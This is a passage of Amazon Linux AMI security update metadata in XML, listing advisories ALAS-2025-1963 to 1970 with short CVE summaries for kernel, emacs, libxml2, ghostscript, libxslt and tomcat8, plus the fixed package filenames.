release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.353-190.569.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.353" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.353-190.569.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1963</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1963: important priority package update for kernel</title><issued date="2025-02-27 23:43:00" /><updated date="2025-03-13 20:58:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-42104:
In the Linux kernel, the following vulnerability has been resolved:
nilfs2: add missing check for inode numbers on directory entries
CVE-2024-39487:
In the Linux kernel, the following vulnerability has been resolved:
bonding: Fix out-of-bounds read in bond_option_arp_ip_targets_set()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39487" title="" id="CVE-2024-39487" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42104" title="" id="CVE-2024-42104" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-devel" version="4.14.352" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.352-190.569.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.352" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.352-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.352" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.352-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.352" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.352-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.352" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.352-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.352" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.352-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.352" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.352-190.569.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.352" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.352-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.352" release="190.569.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.352-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.352" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.352-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.352" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.352-190.569.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.352" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.352-190.569.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.352" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.352-190.569.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.352" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.352-190.569.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.352" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.352-190.569.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.352" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.352-190.569.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.352" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.352-190.569.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.352" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.352-190.569.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.352" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.352-190.569.amzn1.i686.rpm</filename></package><package name="kernel-tools" 
version="4.14.352" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.352-190.569.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1964</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1964: important priority package update for emacs</title><issued date="2025-03-13 20:58:00" /><updated date="2025-03-17 22:45:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2025-1244:
A flaw was found in the Emacs text editor. Improper handling of custom "man" URI schemes allows attackers to execute arbitrary shell commands by tricking users into visiting a specially crafted website or an HTTP URL with a redirect.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-1244" title="" id="CVE-2025-1244" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="emacs-common" version="24.3" release="20.26.amzn1" epoch="1" arch="x86_64"><filename>Packages/emacs-common-24.3-20.26.amzn1.x86_64.rpm</filename></package><package name="emacs-debuginfo" version="24.3" release="20.26.amzn1" epoch="1" arch="x86_64"><filename>Packages/emacs-debuginfo-24.3-20.26.amzn1.x86_64.rpm</filename></package><package name="emacs" version="24.3" release="20.26.amzn1" epoch="1" arch="x86_64"><filename>Packages/emacs-24.3-20.26.amzn1.x86_64.rpm</filename></package><package name="emacs-el" version="24.3" release="20.26.amzn1" epoch="1" arch="noarch"><filename>Packages/emacs-el-24.3-20.26.amzn1.noarch.rpm</filename></package><package name="emacs-common" version="24.3" release="20.26.amzn1" epoch="1" arch="i686"><filename>Packages/emacs-common-24.3-20.26.amzn1.i686.rpm</filename></package><package name="emacs-debuginfo" version="24.3" release="20.26.amzn1" epoch="1" arch="i686"><filename>Packages/emacs-debuginfo-24.3-20.26.amzn1.i686.rpm</filename></package><package name="emacs" version="24.3" release="20.26.amzn1" epoch="1" arch="i686"><filename>Packages/emacs-24.3-20.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1965</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1965: important priority package update for libxml2</title><issued date="2025-03-13 20:58:00" /><updated date="2025-03-17 22:45:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2025-24928:
libxml2 before 2.12.10 and 2.13.x before 2.13.6 has a stack-based buffer overflow in xmlSnprintfElements in valid.c. To exploit this, DTD validation must occur for an untrusted document or untrusted DTD. NOTE: this is similar to CVE-2017-9047.
CVE-2024-56171:
libxml2 before 2.12.10 and 2.13.x before 2.13.6 has a use-after-free in xmlSchemaIDCFillNodeTables and xmlSchemaBubbleIDCNodeTables in xmlschemas.c. To exploit this, a crafted XML document must be validated against an XML schema with certain identity constraints, or a crafted XML schema must be used.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-56171" title="" id="CVE-2024-56171" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24928" title="" id="CVE-2025-24928" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxml2-debuginfo" version="2.9.1" release="6.6.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.9.1-6.6.45.amzn1.x86_64.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.6.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python27-2.9.1-6.6.45.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.6.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.9.1-6.6.45.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.6.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.9.1-6.6.45.amzn1.x86_64.rpm</filename></package><package name="libxml2-python26" version="2.9.1" release="6.6.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python26-2.9.1-6.6.45.amzn1.x86_64.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="6.6.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.9.1-6.6.45.amzn1.x86_64.rpm</filename></package><package name="libxml2-python26" version="2.9.1" release="6.6.45.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python26-2.9.1-6.6.45.amzn1.i686.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.6.45.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python27-2.9.1-6.6.45.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.6.45.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.9.1-6.6.45.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.9.1" 
release="6.6.45.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.9.1-6.6.45.amzn1.i686.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.6.45.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.9.1-6.6.45.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.6.45.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.9.1-6.6.45.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1966</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1966: important priority package update for kernel</title><issued date="2025-03-13 20:58:00" /><updated date="2025-03-17 22:45:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2025-21702:
In the Linux kernel, the following vulnerability has been resolved:
pfifo_tail_enqueue: Drop new packet when sch->limit == 0
CVE-2024-53179:
In the Linux kernel, the following vulnerability has been resolved:
smb: client: fix use-after-free of signing key
CVE-2024-49960:
In the Linux kernel, the following vulnerability has been resolved:
ext4: fix timer use-after-free on failed mount
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-49960" title="" id="CVE-2024-49960" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-53179" title="" id="CVE-2024-53179" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21702" title="" id="CVE-2025-21702" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="4.14.355" release="195.603.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.355-195.603.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.355" release="195.603.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.355-195.603.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.355" release="195.603.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.355-195.603.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.355" release="195.603.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.355-195.603.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.355" release="195.603.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.355-195.603.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="195.603.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.355-195.603.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.355" release="195.603.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.355-195.603.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.355" release="195.603.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.355-195.603.amzn1.x86_64.rpm</filename></package><package 
name="kernel-tools-devel" version="4.14.355" release="195.603.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.355-195.603.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="195.603.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.355-195.603.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.355" release="195.603.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.355-195.603.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.355" release="195.603.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.355-195.603.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.355" release="195.603.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.355-195.603.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.355" release="195.603.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.355-195.603.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.355" release="195.603.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.355-195.603.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.355" release="195.603.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.355-195.603.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="195.603.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.355-195.603.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="195.603.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.355-195.603.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.355" release="195.603.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-tools-4.14.355-195.603.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.355" release="195.603.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.355-195.603.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1967</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1967: important priority package update for ghostscript</title><issued date="2025-04-09 20:55:00" /><updated date="2025-04-17 11:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2025-27836:
Potential print buffer overflow. Fixed in ghostpdl-10.05.0 by implementing stricter buffer length validation.
Info: https://bugs.ghostscript.com/show_bug.cgi?id=708192
Patch: https://cgit.ghostscript.com/cgi-bin/cgit.cgi/ghostpdl.git/commit/?id=8b6d19b2b4079da6863ef25f2370f25d4b054919 (ghostpdl-10.05.0)
CVE-2025-27832:
The calculation of the buffer size was being done with int values, overflowing that data type. The bug has existed since the creation of the file contrib/japanese/gdevnpdl.c.
By leaving the total size calculation to the memory manager, the calculation is done in size_t values, which avoids the overflow in this case and also means the memory manager's overflow protection is effective.
Fixed in ghostpdl-10.05.0
Info: https://bugs.ghostscript.com/show_bug.cgi?id=708133
Patch: https://cgit.ghostscript.com/cgi-bin/cgit.cgi/ghostpdl.git/commit/?id=57291c846334f1585552010faa42d7cb2cbd5c41
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27832" title="" id="CVE-2025-27832" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27836" title="" id="CVE-2025-27836" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ghostscript-doc" version="8.70" release="24.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-doc-8.70-24.34.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="24.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-8.70-24.34.amzn1.x86_64.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-debuginfo-8.70-24.34.amzn1.x86_64.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-devel-8.70-24.34.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="24.34.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-8.70-24.34.amzn1.i686.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.34.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-devel-8.70-24.34.amzn1.i686.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.34.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-doc-8.70-24.34.amzn1.i686.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.34.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-debuginfo-8.70-24.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1968</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1968: important 
priority package update for libxslt</title><issued date="2025-04-09 20:55:00" /><updated date="2025-04-17 11:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2025-24855:
numbers.c in libxslt before 1.1.43 has a use-after-free because, in nested XPath evaluations, an XPath context node can be modified but never restored. This is related to xsltNumberFormatGetValue, xsltEvalXPathPredicate, xsltEvalXPathStringNs, and xsltComputeSortResultInternal.
CVE-2024-55549:
xsltGetInheritedNsList in libxslt before 1.1.43 has a use-after-free issue related to exclusion of result prefixes.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55549" title="" id="CVE-2024-55549" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24855" title="" id="CVE-2025-24855" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxslt-debuginfo" version="1.1.28" release="6.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-debuginfo-1.1.28-6.16.amzn1.x86_64.rpm</filename></package><package name="libxslt-python26" version="1.1.28" release="6.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-python26-1.1.28-6.16.amzn1.x86_64.rpm</filename></package><package name="libxslt-python27" version="1.1.28" release="6.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-python27-1.1.28-6.16.amzn1.x86_64.rpm</filename></package><package name="libxslt" version="1.1.28" release="6.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-1.1.28-6.16.amzn1.x86_64.rpm</filename></package><package name="libxslt-devel" version="1.1.28" release="6.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-devel-1.1.28-6.16.amzn1.x86_64.rpm</filename></package><package name="libxslt-python26" version="1.1.28" release="6.16.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-python26-1.1.28-6.16.amzn1.i686.rpm</filename></package><package name="libxslt-python27" version="1.1.28" release="6.16.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-python27-1.1.28-6.16.amzn1.i686.rpm</filename></package><package name="libxslt-devel" version="1.1.28" release="6.16.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-devel-1.1.28-6.16.amzn1.i686.rpm</filename></package><package name="libxslt-debuginfo" version="1.1.28" release="6.16.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-debuginfo-1.1.28-6.16.amzn1.i686.rpm</filename></package><package name="libxslt" version="1.1.28" release="6.16.amzn1" 
epoch="0" arch="i686"><filename>Packages/libxslt-1.1.28-6.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1969</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1969: important priority package update for tomcat8</title><issued date="2025-04-09 20:55:00" /><updated date="2025-04-17 11:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2025-24813:
Path Equivalence: 'file.Name' (Internal Dot) leading to Remote Code Execution and/or Information disclosure and/or malicious content added to uploaded files via write enabled Default Servlet in Apache Tomcat.
This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.2, from 10.1.0-M1 through 10.1.34, from 9.0.0.M1 through 9.0.98.
If all of the following were true, a malicious user was able to view security sensitive files and/or inject content into those files:
- writes enabled for the default servlet (disabled by default)
- support for partial PUT (enabled by default)
- a target URL for security sensitive uploads that was a sub-directory of a target URL for public uploads
- attacker knowledge of the names of security sensitive files being uploaded
- the security sensitive files also being uploaded via partial PUT
If all of the following were true, a malicious user was able to perform remote code execution:
- writes enabled for the default servlet (disabled by default)
- support for partial PUT (enabled by default)
- application was using Tomcat's file based session persistence with the default storage location
- application included a library that may be leveraged in a deserialization attack
Users are recommended to upgrade to version 11.0.3, 10.1.35 or 9.0.98, which fixes the issue.
More justification and the patch links are available for all versions here:
[1] https://tomcat.apache.org/security-11.html
[2] https://tomcat.apache.org/security-10.html
[3] https://tomcat.apache.org/security-9.html
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24813" title="" id="CVE-2025-24813" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-javadoc" version="8.5.99" release="1.98.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.99-1.98.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.99" release="1.98.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.99-1.98.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.99" release="1.98.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.99-1.98.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.99" release="1.98.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.99-1.98.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.99" release="1.98.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.99-1.98.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.99" release="1.98.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.99-1.98.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.99" release="1.98.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.99-1.98.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.99" release="1.98.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.99-1.98.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.99" release="1.98.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.99-1.98.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.99" release="1.98.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat8-lib-8.5.99-1.98.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1970</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1970: important priority package update for kernel</title><issued date="2025-04-09 20:55:00" /><updated date="2025-04-17 11:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2025-21764:
In the Linux kernel, the following vulnerability has been resolved:
ndisc: use RCU protection in ndisc_alloc_skb()
CVE-2025-21762:
In the Linux kernel, the following vulnerability has been resolved:
arp: use RCU protection in arp_xmit()
CVE-2025-21760:
In the Linux kernel, the following vulnerability has been resolved:
ndisc: extend RCU protection in ndisc_send_skb()
CVE-2025-21753:
In the Linux kernel, the following vulnerability has been resolved:
btrfs: fix use-after-free when attempting to join an aborted transaction
CVE-2025-21731:
In the Linux kernel, the following vulnerability has been resolved:
nbd: don't allow reconnect after disconnect
CVE-2024-57979:
In the Linux kernel, the following vulnerability has been resolved:
pps: Fix a use-after-free
CVE-2024-56658:
In the Linux kernel, the following vulnerability has been resolved:
net: defer final 'struct net' free in netns dismantle
CVE-2024-56650:
In the Linux kernel, the following vulnerability has been resolved:
netfilter: x_tables: fix LED ID check in led_tg_check()
CVE-2024-53103:
In the Linux kernel, the following vulnerability has been resolved:
hv_sock: Initializing vsk->trans to NULL to prevent a dangling pointer
CVE-2024-53057:
In the Linux kernel, the following vulnerability has been resolved:
net/sched: stop qdisc_tree_reduce_backlog on TC_H_ROOT
CVE-2024-50033:
In the Linux kernel, the following vulnerability has been resolved:
slip: make slhc_remember() more robust against malicious packets
CVE-2024-49883:
In the Linux kernel, the following vulnerability has been resolved:
ext4: avoid use-after-free in ext4_ext_insert_extent()
CVE-2022-49720:
In the Linux kernel, the following vulnerability has been resolved:
block: Fix handling of offline queues in blk_mq_alloc_request_hctx()
CVE-2022-49390:
In the Linux kernel, the following vulnerability has been resolved:
macsec: fix UAF bug for real_dev
CVE-2022-49179:
In the Linux kernel, the following vulnerability has been resolved:
block, bfq: don't move oom_bfqq
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49179" title="" id="CVE-2022-49179" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49390" title="" id="CVE-2022-49390" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49720" title="" id="CVE-2022-49720" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-49883" title="" id="CVE-2024-49883" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50033" title="" id="CVE-2024-50033" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-53057" title="" id="CVE-2024-53057" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-53103" title="" id="CVE-2024-53103" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-56650" title="" id="CVE-2024-56650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-56658" title="" id="CVE-2024-56658" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-57979" title="" id="CVE-2024-57979" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21731" title="" id="CVE-2025-21731" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21753" title="" id="CVE-2025-21753" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21760" title="" id="CVE-2025-21760" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21762" title="" id="CVE-2025-21762" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21764" title="" id="CVE-2025-21764" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="4.14.355" 
release="196.618.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.355-196.618.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.355" release="196.618.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.355-196.618.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.355" release="196.618.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.355-196.618.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.355" release="196.618.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.355-196.618.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="196.618.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.355-196.618.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.355" release="196.618.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.355-196.618.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.355" release="196.618.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.355-196.618.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.355" release="196.618.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.355-196.618.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.355" release="196.618.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.355-196.618.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="196.618.amzn1" epoch="0" 